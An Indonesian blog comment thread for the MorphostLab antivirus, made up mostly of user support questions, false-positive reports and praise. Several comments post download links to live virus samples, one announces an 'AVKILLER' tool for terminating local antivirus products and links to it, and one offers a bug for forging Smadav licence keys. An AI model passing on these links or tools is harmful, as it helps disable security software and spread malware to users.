MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Comment Me! [Morphic]

Morphic Karta….

thanks ya dah kunjungi blog saya.

Morphostlab.com

834 Tanggapan to “Comment Me! [Morphic]”

  1. Kangen sama blog ini..
    Sama teman2 juga..😀😥

  2. Elma said

    Oh my goodness! Awesome article dude! Thanks, However I am going
    through difficulties with your RSS. I don’t understand the reason why I cannot subscribe to it. Is there anyone else having similar RSS issues? Anybody who knows the answer will you kindly respond? Thanks!!

  3. What i do not understood is if truth be told how you’re now not really much more neatly-preferred than you might be right now. You’re so
    intelligent. You understand therefore significantly
    when it comes to this matter, made me personally imagine it from so many varied angles.
    Its like women and men are not interested
    until it’s one thing to accomplish with Girl gaga! Your personal stuffs nice. At all times deal with it up!

  4. siboik said

    kenapa seluruh file yang html dideteksi virus semua bro….bisa diperbaiki ga bro…
    soalnya datanya penting banget ni..

    • Alexander Lumban Tobing said

      Menurut pengalam saya: coba edit file HTML tersebut, lalu periksa code-line paling bawah. HAPUS semua code-line, tepat setelah “” (tanpa tanda kutip). Selamat mencoba.

      Mohon saran dan kritik (if11101@students.del.ac.id). Masih pemula.

    • Alexander Lumban Tobing said

      Ayo morphost,… Maju terus….!!!!

      Sori baru ada kabar sekarang ya….

  5. Menurutku banyak kekurangan pada antivirus morphost
    1.tidak adanya fitur real time protection. jadi kalo ada virus lewatno detect. walaupun ada tapi kurang bagus
    2.walaupun cepat dalam pendeteksian scan. tetapi dalam hal memperbaikinya menurutku cukup jelek.
    3.update-an database virus terkadang error
    4.fitur write-protector: aku sangat tak menyukainya karena jika saya sudah mengaktifkanya saya tidak bisa copy,paste,delete,format flashdisk,cd,terkadang harddisk. dan saya pernah lupa akan hal ini lalu menguninstal AV ini.memperbaikinya terkadang harus nge-cek ke registry.
    teruz apa lagi yaaa… sekian deh dari saya.

    terimakasih

  6. Ilham said

    gk da database buat 2012 yee….

    klo gk da mnta morphost 9’a jha

  7. MaxX said

    Maaf sebelumnya, kenapa di sini tidak ada fitur searchnya? padahal bisa sangat berguna, karena saya mencari info yang sudah lama, tidak ketemu. Jika harus mencari satu persatu, maka akan membutuhkan waktu yang sangat lama. Terimakasih.

  8. bang Surip said

    morphost 9nya mana nih Bang?

  9. Abdillah said

    Ayoo… Morphost..!! Teruslah berkarya,…

  10. Machfudz said

    ayee sir!!!

  11. Saya pernah aktifkan usb write protected di morphost, ternyata flashdisk saya tidak bisa disimpan, copy, delete dan format.
    Cara menonaktifkan write protected giman??plisss karena membuat tugas saya terbengkalai
    thanks

  12. siska said

    Saya pernah aktifkan usb write protected di morphost, ternyata flashdisk saya tidak bisa disimpan, copy, delete dan format.
    Cara menonaktifkan write protected giman??plisss karena membuat tugas saya terbengkalai
    thanks

  13. hamka said

    mau nanya gimana caranya merestore file yang di kandangkan morphot, kok banyak banyak softwareku yang dikandangkan?, tq

  14. HermansyaH said

    Wah……….
    Ternyata Morphost tingkat deteksinya TINGGI
    Salut !

    Tapi kenapa ya di Binjai Morphost g’ terkenal
    Padahalkan Morphost buatan orang Medan
    yang lumayan dkat dgan Binjai

  15. yanz(RZT) said

    Apakah Anda semua percaya dengan perkataan anda sendiri……….. coba buktikan dengan MORVHINZ ANTIVIRUS

    Om morphik ?? udah belum revisinya?? aku mau download morphostnya?… kita banting virus bareng2 haha

  16. Frojan said

    wah dah mati ya g ad update

  17. yudha said

    cek imel yoo, checkidot… 🙂

  18. darji said

    haloo

    maaf, saya baru dalam hal komputer.
    kompuetr saya kena virus autorun.inf, memang morphost deteksi akan tetapi setiap di hapus masih muncul lagi.

    ada folder RECYCLE dan beberapa shorcut yang tertampil, oleh morphost di hapus ato dikandangkan akan tetapi tetap muncul.

    dalam folder RECYCLE virus menggandakan diri sendiri, sehingga flasdis saya yang 4 GB free space 2 GB selama 2 jam dicolokin ke kompuetr jadi penuh flasnya.

    mohon di bantu..
    please, kayaknya file induk virus dalam kompuetr saya belum ke detect ma morphost.

  19. Jibe said

    Morph…sy mau komen antivirusnya ya :
    The Bad :
    – Scanningnya menghabiskan waktu cukup lama
    – Ada beberapa “false detect”.
    1. Program Panda USB Vaccine dianggap Worm-015
    2. File notepad Readme.txt dianggap Encrypted VBS
    3. Program chatting Trilian dianggap Malware.HDS-2
    4. Plug-in dari Trilian dianggap ToolsTerlarang-003
    5. Heuristicnya masih kurang aggresive.
    – Tidak dapat update secara langsung dari programmnya mesti download manual / Fitur Update Database tidak bekerja dengan baik
    – Screen tidak dapat diperbesar
    – Deteksi removable disk sering gagal (pas colok usb, usbnya tidak terdeteksi. Mesti restart AVnya dulu)

    The Good :
    + Real-time protector aktifnya cepat
    + Penambahan malware list / definition cukup cepat

    semoga komentar sy ditanggapi secara positif ya…^___^
    terima kasih🙂

  20. yoshi said

    Hello morphian,
    ingin bertanya…
    masing masing drive di PC saya ada folder recycled nya, tiap di apus nongol lagi…kira2kena virus apa ya ini?? mohon bantuannya…thanks…

  21. jafeto said

    Hi Morp,

    Butuh bantuan, hdd eksternal saya WD kena virus MalayX.b bisa tolong bantu info bagaimana cara menyembuhkannya?

    Thankyou

  22. Haris said

    Mas,

    Gimana cara jalankan morphost di windows xp mini / live CD ? soalnya saya udah coba tapi cuma tampil spashnya doang lalu hilang. ( kayaknya morphost juga nggak bisa dijalankan di server 2003 R2) Help.. saya butuh mau bersihin laptop tapi bootnya dari CD, mohon pencerahan.

    thanks

  23. …bang.. aqu msh newbie ne…

    …gini bang,,, setelah netbook ane, ane scan morphost… dan hasilnya 3 virus tu yang di deteksi di system… nah .. sudah sya coba memilih Tuntaskan virus.. tp tidak bisa di tuntaskan bang..

    …trus saya pilih kandangkan??.. pertanyaan saya… kok g bisa dituntaskan ia ? trus… kalo dah dikandagkan.. itu virus msh bekerja tidak ?? thanks befor bang morphic… sukses selalu

  24. depe said

    bang mantaps anti virusnya…ane mw nanya ni,pas nyoba usb protect trus usb ga bisa ngopy file…balikinnya gmn ya bang..thank buanget antivirusnya….ane promoin ke temen2 bang..

  25. Roni91 said

    maap gan,ane mw nanya…
    kompi ane kena virus serviks di dekstop..
    ane udah nyoba bersihin cara manual,ane scan pake smadav jg udah (tp ga terdeteksi).
    autorun.inf,*.lnk,dekstop.ini udah ane hapus smua…
    wscript jg udah..
    tp tetep aja msh nongol tu serviks
    morphost bs bantu ngilangin ga ya…

  26. ars said

    saya coba donlod sampel virus yang ada di sini diantaranya viri, jodoh hari ini..
    tapi kok sama morphost sendiri gak kedetek???
    kanapa ya?
    lum ada di database?

  27. d1mz03t said

    mas, q baru mw make morphost
    tiap q download, pilihan open file’a selalu ja foxit reader
    jadi bingung…????

  28. VirSpector said

    Wah gan, ini ada animated banner Morphost Antivirus buatanku.
    Silahkan lihat contohnya di websiteku (Bagian banner, http://www.virspector.uk.to)

    Untuk scriptnya:

  29. diegoz said

    aku adalah pengguna baru dari anti virus ini, tapi masih ada yg kurang, coba ditambahkan menu jika kita membuka explorer dan mau menyecan sebuah folder tinggal klik kanan maka akan muncul menu scan with morphost, dan juga ketika flashdisk di tancapkan pada laptop langsung tersecan otomatis, jadi tidak perlu membuka windows morphostnya, satu lagi ketika melakukan scanning terlapau lambat… mohon pada update terbarunya sudah semakin di perbaiki.. dan maju terus

  30. hendynet said

    morphic has far far far far away from home…..
    makin mantap saja antivirus yang satu ini,….
    terus kembangkan bro,..
    maju, tetap semangat,..
    salam dari salah satu alumni virologist,…..

    (nb: masih pake 4shared aja bro,..hehehe…, kalo boleh usul sih pindahin ke maknyos.com aja, link lokal yang lebih cepet)

  31. agus said

    Heeran sudah 2 kali saya download dan instal morphost, tapi kok gak muncul menu tampilan pilihan scan-nya yang ada hanya tampilan deteksi memori ajah. Kumaha iey?

  32. Arif said

    Mas! bgmana cara mengatasi virus new heuristic level 9. saya udah format total harddisknya virusnya belum juga ilang!

    • Morphic said

      maaf, heuristic level 9 bukanlah nama virus melainkan nama heuristik.
      kamu bisa kirimkan dulu sampelnya pada kami. baru kami bisa bantu solusinya.
      Terima kasih ya..

  33. Oneboelle said

    Terus terang, kalo komentar, aku paling segan dehh..
    Tapi buat Morphost ini,… Mathabbbzzz…!!!
    Mungkin aja karena kebetulan virus yang aku dapat ini, ada dalam data-list-nya Morphost.
    Tapi biar gimanapun, sekali lagi, thanks beratzz..!!

  34. mas, aku minta no HP nya mas ya?
    di kirim lewat email ya mas?? ada yang ingin aku bicarakan langsung sama mas???????

  35. Morpost is are the real AV

  36. Candrabxq said

    Kenapa kok morphost di anggap malware sama antivirus dari Avg.karena memang saya pakai 2 antivirus yaitu avg dan morphost.Avg untuk virus asing dan morphost untuk virus lokal.Kenapa ya bos?apa enggak boleh pakai 2 antivirus.Mohon penjelasannya ya bos…

  37. Wumbo said

    mantap gan!!
    virus bluefantasy yg dah ngendog di lappy ane selama 6 bulan habis dalam waktu 2 hari(hari pertama abis ngerjain tugas soalnya XD)
    soalnya ane pake WinME sm*d*v gk bisa….
    lagi jalan2 di CCPB nemu ginian😄
    thx banget gan :cendolbig

  38. AgusFerdi said

    ….. Hormat kami BTK (banyak terima kasih), Semoga bisa menjadi Konsultan atau profesor ANTIVIRUS KOMPUTER (semoga juga medis/kedokterannya … amin). Sekarang aku jadi PD kalau mengenalkan/menyebarluaskan tentang antivirus lokal yang hebat ini ….., BTK.

  39. aaaa said

    mas morphic
    untuk dukungan uac di win 7 koq blum support?

  40. OeL said

    Bos morphic aku ngirim sampel malware mslogon(Trj/Buzus.cxxq1) ke email
    coba cek aja….

  41. dev said

    Maap mas..
    kok saya gak bisa update database-nya mas..
    Proses Pembaruan Database Gagal !
    Kerusakan:
    File Not Found

  42. agusferdi said

    mas kenapa dari dulu ( mulai morphost green) sampai sekarang yang namanya program-program dari http://www.piriform.com seperti Ccleaner dan Defraggler yang sudah terkenal aman dan banyak dipakai kog selalu kalau discan oleh morphost pasti dikatakan ada virus fake-scanner ? karena fileku itu jadi hilang semua, beberapa (banyak sih !) temanku malah sudah gak percaya sama morphost, tolong dijawab atau diperbaiki pengenalan virus scannernya ya, kalau aku sih percaya sama morphost tetapi sedikit kecewa tentang hal itu ! tolong ya mas ….. terima kasih (aku tunggu jawaban secepatnya biar gak tambah kecewa dan nanti teman-temanku akan aku kasih tahu hal ini semua)

  43. phiel said

    mas hasil scan ada yang namanya “fake scanner”… itu virus apa bukan?

  44. Glenn said

    hi, mas.
    saya baru pake antivirus ini sejak September 2010 waktu lagi nyariin antivirus buat shortcut-shortcut aneh yang membandel. Setelah pake antivirus ini, langsung ilang deh shortcut antah berantah itu.

    Sore ini (Dec 5 2010) saya dipanggil temen untuk bantuin dia bersihin virus lama yang membandel. Pas saya cek, ternyata itu adalah virus maxtrox (yang adalah buatan temen saya tapi dia nggak mau ngasih cara membasminya selain memberikan kalimat “banyak cara kok untuk ngapus virus itu”). Tahun 2007 akhir sih dia udah pernah bikin maxtrox removernya, tapi saya heran, kok virus tersebut bisa muncul lagi ya. Padahal laptop penderita barusan dibeli (cuman ya si empunya yang teledor klik sana sini, transfer sana sini).

    saya udah upload induk virusnya.
    http://www.4shared.com/file/wNFlzQ6F/maxtrox_file.html

    kalo di direktori, dia bisa ditemukan dengan cara:
    – masuk ke C:\Documents and Settings\ *nama user*\ My Network Places\ Network Connection
    – delete semua file yang ada di situ
    – nah, nanti akan ada 1 atau 2 file yang tidak bisa dihapus

    mohon bantuannya ya, mas (saya baru tahu kalo sang pembuat morphost antivirus adalah seorang pria… ahahahahaha…. saya pikir cewek..)
    soalnya antivirus yang lain nggak bisa ngapus; sedangkan antivirus lokal yang dimiliki perusahaan majalah komputer besar Indonesia belum berhasil menuntaskan sampai ke akar-akarnya… hghuhuhuhu

  45. Mas..
    Nih ad sample virus,,

    http://www.ziddu.com/download/12801628/WindowsXp.rar.html

    kmaren morphost udah deteksi tp gx bisa ngapus virus nya..
    Jadi virus nya aq hapus manual dech…:)

  46. bata_merah said

    saya coba morphost di vista, kok banyak yang false alarm ya morphost?
    saya sudah test ke virustotal.com… eh ternyata file tersebut baik2 saja.
    jadi bingung nich.
    mau melindungi atau merusak????

  47. Bayu said

    gan, knapa flashdisk kagak bisa direname??
    apa trjangkit virus gan???
    thankzzzz . . . . . bravo morphos

    • Morphic said

      Kenapa tidak bisa gan?
      sudah dicoba di komputer lain???

      usahakan nama yang baru jangan melebihi batas.😀

      • Alexander Lumban Tobing said

        atau mungkin, akibat ‘autorun.inf’ yang terdapat pada halaman pertama flashdisc…?

        karena, dulu fd ku pun begitu, tapi setelah kuhapus autorun.inf-nya, jadi bisa di-rename lagi… (berdasarkan pengalaman saya, loh)
        hehe

  48. oiah tambahan sdkt kak…. folder sm file yang ada di situ semuaNy berawalan Dc135,,, Dc167 pokokNy jadi berawalan Dc

  49. kak saya mau tanya kenapa semenjak saya make morphost folder Recycle di Drive C saya isiNy ga bisa ke hapus lagi, jadi semua sampah yang masuk ke situ ga bisa di delete pdhl dulu bisa. mohon penjelasanNy kak

    di folder ini semua sampah ga bisa di hapus >> C:\RECYCLER\S-1-5-21-1957994488-2077806209-725345543-500

  50. BAyu said

    File Discan : 10277
    Malware Ditemukan : 1 (windowsGenuine)

    WindowsGenuine Ditemukan di :C:\WINDOWS\system32\WgaLogon.dll

    Pemeriksaan berakhir pada : 9:27:24 PM, 11/2/2010

    apakah malware diatas berbahaya bg PC saya?? mohon jawabannya.. thanks

    • Morphic said

      ooh, itu tidak berbahaya gan.
      dulu, WindowsGenuine sering membuat user windows XP bermasalah..
      artinya user sering tidak nyaman karena adanya kehadiran WindowsGenuine.

      Nah, jadi kami berinisiatif untuk memasukkan WG ke database Morphost.
      File tersebut kamu hapus juga tidak masalah…

  51. zap said

    om mo tanya morphost 8 kok blm dilengkapi feature exclude list ya…?? klo sudah ada ada di bagian mana? soalnya saya sangat memerlukan feature ini.. oh iya saran dari ane klo bisa morphost juga di lengkapi dengan self protect defence. ok segitu dulu ya, tengkyu maju terus MORPHOST LAB.

  52. vhalen said

    bang morphost.. mau tnya donk.. gw donlod morphost terbaru tuh d kompi gw bs n lancar2 ajah..
    tp pas gw copy k laptop gw yg msh baru d install morphost’a ga bs jalan alias ga kluar,, begtu d klik morphost exe’a loading trus ga kluar jendela buat scan’a..
    pas gw cek task manager’a tuh program jalan tp ga kluar tampilan’a.. mohon bantuan’a dunk..
    apa da yg slh ama laptop gw ato gmna?? cz tuh lapyop msh baru bgt,, n blom ada apa2’a..

  53. jei said

    bang, koleksi virusnya koq cuma sampe database januari 2010 sih??? q khan g’ bisa belajar virus lagi…………..

  54. I-One said

    gan mau tanya niey,….
    komputer saya keserang Virus pesan rahasia, Foto Bugil, Folder…
    saya dah coba scan pakai Morphost Antivirus Versi 8 koq masih lom bisa hilang ya virusnya??

    mohon bantuannya gan..
    tq…

  55. bayu said

    gan ada yang mau saya tanyakan lagi!!!
    dkomputer ane ada antivirus kaspersky….pas ane pasang morphost kedetek virus “Flulkan” pada kaspersky.exe nya.apakah itu termasuk virus gan????
    thankzzzz atas bantuannya gan…

  56. bee said

    apakah morphost bisa dipadukan dengan antivirus lain,,,,,mksdy sprt PCMAV+CLAMAV?

  57. Luna said

    Laptop dan flashdisk Luna selamat berkat antivirus Morphost

    Inilah kenapa Luna cinta produk anak bangsa…

    Luna dukung tim MorphostLab 100%!
    Semangat ya dalam pengembangan dan penyempurnaan antivirusnya~

    Morphost okeh! (^o^)//

  58. pram said

    Ommm Morphic…..HIKS..HIKS…
    Laptop aye kena Virus shortcut “Funny” om. aye pake morphost update-an oktober ga mempan om.Eh yang ade Morphost yang tadinya lberoperasi lancar di laptop aye jadi ga bisa jalan,malah “not responding”.Entah kenapa saya hapus file shortcut yang ada di drive C:document and setting\user\recent eh malah file yang ada di D yang hilang….HIKS..HIKS mana file penting lagi…
    Tolong Solusinya Omm…. T_T

  59. Dewiosa said

    Mas, mau tanya caranya hilangin virus shortcut + stuxnet gmn? soalnya udah aku instal ulang tetap aja muncul.
    setiap flashdisk yg masuk pasti diserang. folder2 yg di FD di hidden semua. Trus ada file2 .exe yg kedetect virus.
    Mohon Pencerahannya ya Bang..
    matur tengkyu..

  60. Bobby said

    Mas saya mau nanya nie..saya sedang bikin anti virus buat skripsi saya, pake vb ato vb.net rencananya..cuman t saya masie blm tawu cara gmana untuk full scan and repair window registry..bisa mohon bantuan atau saran mas?? makasi sebelonnya =)

  61. jei said

    bang phic, baru saja ane men-scan flash disk temen ane, kayaknya morphost kecolongan. setelah ane men-scan flash disk tmn ane, morphost tdk mendeteksi satu virus pun tapi avira mendetek 81 virus diantaranya SALITY dan CHIR.B

    • Morphic said

      gan. satu hal yang paling tabu dilakukan kalau morphost disanding dengan antivirus lain.
      dan bukan cuma Morphost seperti itu. Semua antivirus lokal memang begitu.
      Antivirus asing memang jagonya ‘memegang’ file-file.

  62. dhie said

    bang ane mw tanya nih, kompi ane keserang serverx.exe
    gmn ya cara melumpuhkannya,,
    ane cba ya antivirus nie,,
    lam kenal,,,🙂

  63. Bee said

    oya satu lagi, kompiku jadi lambreta…

  64. Bee said

    hehehe…orang awam nie. lagi bingung kompi diserbu virus terus, fakeshorcut, yuyun.udah dituntaskan, slalu balik.jadi gak bisa ngeprint krn memory full. hari ini muncul lagi baru, judulnya lirik, stiap kali ngidupin kompi muncul notepad lirik lagu ada keterangan di bawahnya (www.bendot.co.nr), tp yg ini gk muncul di laporan Morphost.hadddeeeehhhh….sampe sesek nafas….

    Tolong yak mas Morphic…bantuin yak…jangan ketawa yak…aku bener2 gak mudeng mslh ni, taunya cuman pake kompi…

    Oya, makasih ak dh donlod yg versi 8, semakin cerah, i like the “Buzz”…

  65. agusm said

    Salam…saya tertarik setelah baca mengenai morphost antivus.
    yang saya tanyakan apakah virus Fake Folder juga bisa di eliminasi.
    Terima kasih sebelumnya.

  66. kak, gimana caranya agar kita dapat menghapus start-up virus yaitu seiluh.exe, virus nya akan bekerja jika flashdisk tercolok dan langsung menginfeksi flashdisk dengan cara mengisinya dengan shortcut yang banyak dan menghidden tiga Apps yaitu: seiluh.exe, smss.exe, dan isass.exe. dan jika flashdisk tersebut dicolokan ke kompi lain 3 Apps tersebut langsung masuk ke start-up dan procces dan terus berulang – ulang dan merussak sebagian program browser seperti google chrome. gimana nih kak.

  67. Alexander said

    Kak, kenapa belum di-update artikel di MorphostLab…? Udah gak sabr, menunggu artkel terbaru dari Morphic… hehe

  68. aHaaa said

    bro morphic,

    mohon bantuannya untuk analisa virus ini yah.

    http://www.4shared.com/file/hSGVGKwc/sample_virus.html

  69. arief said

    ass,,’
    salam kenal
    mas morphosnya lum bisa jalan sempurn di win 7 ultimate,,ketika aya klik pengaturan ada pesan,,”anda harus mengaktifkan morphost….”,, sya klik ya,,,muncul “morphost auto detect sudah aktif….”,,,namun ada lagi pesan “invalid root in registery key……”

    mohon pencerahan,,…
    wasss..

  70. gajahpersia said

    Salam Kenal master morphostlab..
    Saya mau minta tolong …
    kompi saya kena virus Trojan-Downloader.Win32.Agent.dcbu (kata kaspersky)
    W32/Diliman.B (kata avira)

    tapi kok belum bisa disinfect dan cured ya…
    bisanya cuman quarantine aja…
    mohon pencerahannya.. makasih.

  71. adeshinichi said

    Lama tak berkunjung phic….
    Oia, minta ijin utk make virus di 4sharedmu….
    Boleh kan????

  72. kokoro9kyu said

    Hasil scan C:\ hanya 3mnt (ga tuntas)

    AutoIt-A Ditemukan di :C:\WINDOWS\system32\AbaleZip.dll
    Ecel.Troj Ditemukan di :C:\WINDOWS\system32\ECELP4.ACM
    Fanny.Troj Ditemukan di :C:\WINDOWS\system32\mscorwin.dll
    Fanny.Troj Ditemukan di :C:\WINDOWS\system32\comhost.dll

    Si Comhost.dll ga bisa di delete ga bisa di quarantine kenapa ya T_T

    trus si morphostnya suka mati sendiri pas lagi scan, keknya pas lagi ngescan apa gitu langsung mati sendiri morphostnya… ga bisa full scan deh T_T

    ^^

  73. armandz said

    Report:
    3 proses virus ditemukan
    Pemeriksaan dimulai : 1:31:39 PM, 9/11/2010

    File Discan : 96
    Malware Ditemukan : 45
    Malware Dihapus : 0
    Malware Dikarantina : 0
    File Ancaman : 0

    Harlug Ditemukan di :C:\Documents and Settings\Boombas 38\knyeom.exe
    Harlug Ditemukan di :C:\Documents and Settings\Boombas 38\alg.exe
    Harlug Ditemukan di :E:\knyeomx.exe
    FakeShortcut Ditemukan di :E:\Programs.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert.lnk
    ErtModule Ditemukan di :E:\ert.dll
    Yuyun Ditemukan di :E:\dekstop.ini
    FakeShortcut Ditemukan di :E:\Microsoft.lnk
    Harlug Ditemukan di :E:\knyeom.exe
    Harlug Ditemukan di :E:\knyeomx.exe
    Harlug Ditemukan di :E:\x.exe
    FakeShortcut Ditemukan di :E:\Music.lnk
    FakeShortcut Ditemukan di :E:\unlocker.lnk
    FakeShortcut Ditemukan di :E:\Compressed.lnk
    Malicious-INF Ditemukan di :E:\unlocker\autorun.inf
    Yuyun Ditemukan di :E:\unlocker\dekstop.ini
    FakeShortcut Ditemukan di :E:\unlocker\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\unlocker\Music.lnk
    Malicious-INF Ditemukan di :E:\Compressed\autorun.inf
    Yuyun Ditemukan di :E:\Compressed\dekstop.ini
    FakeShortcut Ditemukan di :E:\Compressed\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Compressed\Music.lnk
    Malicious-INF Ditemukan di :E:\Programs\autorun.inf
    Yuyun Ditemukan di :E:\Programs\dekstop.ini
    FakeShortcut Ditemukan di :E:\Programs\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Programs\Music.lnk
    Malicious-INF Ditemukan di :E:\Morphost Expert\autorun.inf
    Yuyun Ditemukan di :E:\Morphost Expert\dekstop.ini
    FakeShortcut Ditemukan di :E:\Morphost Expert\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\Music.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\Kandang Virus.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\Plus Features.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\DatabaseMorphostSeptember2010.lnk
    Malicious-INF Ditemukan di :E:\Morphost Expert\Kandang Virus\autorun.inf
    Yuyun Ditemukan di :E:\Morphost Expert\Kandang Virus\dekstop.ini
    FakeShortcut Ditemukan di :E:\Morphost Expert\Kandang Virus\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\Kandang Virus\Music.lnk
    Malicious-INF Ditemukan di :E:\Morphost Expert\Plus Features\autorun.inf
    Yuyun Ditemukan di :E:\Morphost Expert\Plus Features\dekstop.ini
    FakeShortcut Ditemukan di :E:\Morphost Expert\Plus Features\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\Plus Features\Music.lnk
    Malicious-INF Ditemukan di :E:\Morphost Expert\DatabaseMorphostSeptember2010\autorun.inf
    Yuyun Ditemukan di :E:\Morphost Expert\DatabaseMorphostSeptember2010\dekstop.ini
    FakeShortcut Ditemukan di :E:\Morphost Expert\DatabaseMorphostSeptember2010\Microsoft.lnk
    FakeShortcut Ditemukan di :E:\Morphost Expert\DatabaseMorphostSeptember2010\Music.lnk

    Pemeriksaan berakhir pada : 1:32:29 PM, 9/11/2010

    gan file yang tipenya harlug ga bisa di hapus dari flashdisk, ada solusinya? klo bisa email ke armandz0@yahoo.com

  74. Maxx said

    Pic, kenapa comment gw yang di bug key Sm*d*v nggak di munculin? Tiap comment, kek gitu terus….

  75. yudha said

    hari ini sampel terakhir sebelum aq Mudik.

    phic, sampel virus Stuxnet dan Random8 sudah kw download. lg bnyak menyebar tu.

  76. aMetz said

    Thanks Yupz Bang Karta…. aMetz Jadi belajar banyak tentang cara analisis viruz….. di situs ini…
    Project aMetz viruz trackerz V.32 sih hampir selesai dan sudah banyak mendeteksi viruz lokal dan luar…..
    nanti kalo udah jadi dikirimin deh filenya ke bang karta…. biar makin banyak kritik saran …..
    morphost emang lebih cepet akurat mendeteksi viruz namun untuk tampilannya masih kurang user friendly….
    tetapi MORPHOST aantivirus is the best for me…. Thanks

  77. FAKHRICKER said

    Om ne virus FAKHRICKER
    silahkan dunlud di:

    http://www.mediafire.com/?c2aedmliu8lsgc3

    Silahkan di analisa ya bang
    manatahu tq update artikel morphost yg baru
    ^^

  78. FAKHRICKER said

    Om ane dapat bug smadav yg baru ne
    rev 8.2

    Tpi bukan mematikan RTP
    Melainkan cara membuat lisensi pro dengan nama atau key kita sendiri
    Kira2 dimana ya sya uload artikelnya????

  79. culunabis said

    Pengemar morphic
    saya download morpic bulan update agustus 2010
    trus kok komputer saya ngak bisa di klik kanan ya..

    1 lagi bang morphic punya simple virus minta donk.. please tugas nih

    QGS
    Senseii.vbs

  80. dewa said

    Bro… kok aku skip penghitungan file jadi hang ya Morphost nya ?? Terjadi sejak download Database terbaru Agustus 2010. Atau pengaruh AVG Internet Security ? Mohon penjelasan….

  81. Mas Morphic,, virus yg bikin folder jd shortcut ntu viru apaan y??

    td tmn aq ad yg nanyain..

  82. Phic, aq nemuin beberapa bugs nie… mohon di cek…
    Bugs Bunny

  83. yudha said

    iya phic, q kira pagi ni udah rilis. teman-teman dunia maya jg udah pada nanyain tuh, dah tanggal 10 katanya…

  84. b_agoy said

    Bro, gmna email ane dah masuk blm???

  85. praz said

    bro morphic, mw nanya ni,
    napa y pas q buka orphoct lgsg close sndiri? mw ngescan jg ga bs..

  86. yudha said

    soru phic, aq baru sempat ol lagi. oia, kapan beta testernya di rilis? kirimnya via email q ya phic… q tunggu.:-)

  87. nyiur said

    AVKILLER 1.0
    =============
    )c( 2010 nyiurmelambai
    =============
    Sudah kuatkah AV anda??? JANGAN PERCAYA BEGITU SAJA!!!

    SILAHKAN TES AJA SENDIRI!! APAKAH AV ANDA MAMPU BERTAHAN DARI AVKILLER YANG LAPAR!!

    HUAHAHAHA

    SEBELUM MELANJUT, SAYA MAU MENGATAKAN TERLEBIH DAHULU BUKAN MAKSUD SAYA MENGUNGGULKAN

    AV SATU DAN AV LAIN, TAPI SEMATA-MATA DEMI MENUNJUKAN KEKURANGAN2 YANG BISA KEMUDIAN

    DIPERBAIKI KEMUDIAN HARI!!! ^:)^

    DAFTAR AV YANG BISA DIDETEKSI!!!
    – SMADAV
    – Morphost
    – CMC
    – ANSAV
    – PCMAV

    DAFTAR AV(MODE RTP & PORTABLE) YANG GAK BISA BERTAHAN, MESKIPUN PAKE TEKNIK UNICODE!!!
    – SMADAV (gagal teknik unicodenya TRIANGLE)
    – Morphost (Mo pake Alpha Beta or Unicode lain, sama aja gagal brow!!!)
    – CMC
    – PCMAV*

    AV YANG KEBAL
    – ANSAV 😛

    ANSAV SATU2NYA AV LOKAL YANG PALING SUSAH DITAKLUKAN, HAMPIR MUSTAHIL DIMATIKAN SECARA

    LANGSUNG KARENA AV INI MENERAPKAN TEKNIK Ring0(mode driver). Seberapapun usaha ngekil

    dia bakal bangkit lagi. SELAIN ITU KAYAKNYA AV INI MELOAD LIBRARY KE HAMPIR SETIAP

    PROCESS, SEHINGGA ADA KEMUNGKINAN APP LAIN AKAN TERKILL.

    note: NAMA AV HARUS DALAM KEADAAN DEFAULT, CONTOHNYA SMADAV -> SM^RTP

    Download
    http://www.dewaphobia.com/free-upload/avkiller.zip

  88. OeL said

    Bos,virus aku kirim ke email, cek aja ya!!!
    sorry klu sampelnya dobel maklum lagi error kompienya.

  89. OeL said

    bos, aku ada sampel trojan cndrive32.exe & msvmiode.exe
    linknya http://www.4shared.com/file/yVVd4Pfz/virus.html
    silahkan dicoba..
    (virus ini memblok akses internet)

    • Morphic said

      oeL, linknya invalid. karena filenya sudah terdeteksi ama kaspersky 4shared.
      jadi malware yg kamu kirim udah masuk ke quarantine tuh..

      Note:
      beri password tiap kali upload di 4shared.

      thanks ya.
      memang ak butuh juga sampel cndrive32 itu

  90. Ardy Prologic said

    Boleh pasang banner morphost d blog gx..???

  91. Ade Shinichia said

    Phic, kaw punya user control bwat ngcek FD yg msuk gag???? share dunk….

  92. mur said

    share fB bro….

  93. Kevin said

    Ada bug nih di Morphost Expert Plus…
    Pas bikin extensi smsh, si morphostnya langsung ngeklos.
    kyak gmn thu?

  94. Kevin... said

    Ada bug nih di Morphost Expert Plus…
    Pas bikin extensi smsh, si morphostnya langsung ngeklos.
    kyak gmn thu?

  95. Alvian said

    slam knal z bang! mohon izin bang alamat web nya dah ak tmbahkn di blogroll saya! wah…kren bngt antivirus ak dah pake nich, thnk’s y! mudh2an lebih kren lg!

  96. kapan morphost terbaru di keluarkan?? q salah satu pennggemar mu…

  97. Albanien said

    waktu pake morphost malware kedetect…terus saya kandang tapi akhirnya desktop, start menu gak muncul ilang smua..gmana solusinya bro

    • Morphic said

      kamu pake versi berapa nien?
      dan pastikan pakailah database yang paling terakhir yaitu database juni (juli belum keluar).
      dengan begini kemungkinan false detect sangat kecil.

      kasus yang anda alami dikarenakan proses “explorer.exe” diterminate.
      anda bisa menghidupkannya secara manual dengan taskmanager lalu meng-run kembali process “explorer.exe”

    • yudha said

      coba pakai bengkel Registry ke-1 di fitur morphost aja sob.
      kalau efeksnya belum muncul, klik “segarkan explorer”

      atau Bengkel Registry-4 , klik “Quick Tweak”

  98. Cuma mau sharing simple scanner buatanku…..
    Silahkan di kembangin sendiri…..

    Simple Scanner

    nb: Pass tanya ja ma aq d FB… (ade shinichi edogawa)

  99. Syarifudin said

    Koq database nya morphost cuma 600-san ya……. sia-sia kalo heuristicnya morphost itu bagus tp signature-nya cuman segitu……saya akan meng-upload virus sebanyak-banyaknya agar morphost mampu menyaingi smadav…..atau download sampel virus di http://www.vx.netlux.org…...!!! thank’s

    • yudha said

